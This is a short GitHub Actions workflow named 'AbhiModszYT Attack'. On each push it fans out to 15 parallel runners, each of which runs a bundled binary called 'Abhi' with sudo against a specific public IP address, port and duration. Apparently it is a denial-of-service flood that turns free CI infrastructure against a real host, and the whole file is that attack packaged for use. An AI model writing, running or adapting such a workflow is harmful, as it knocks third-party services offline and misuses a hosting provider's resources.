name: AbhiModszYT Attack
on: [push]
jobs:
  alone:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
    steps:
    - uses: actions/checkout@v3
    - run: chmod +x Abhi
    - run: sudo ./Abhi 91.108.17.58 32002 30
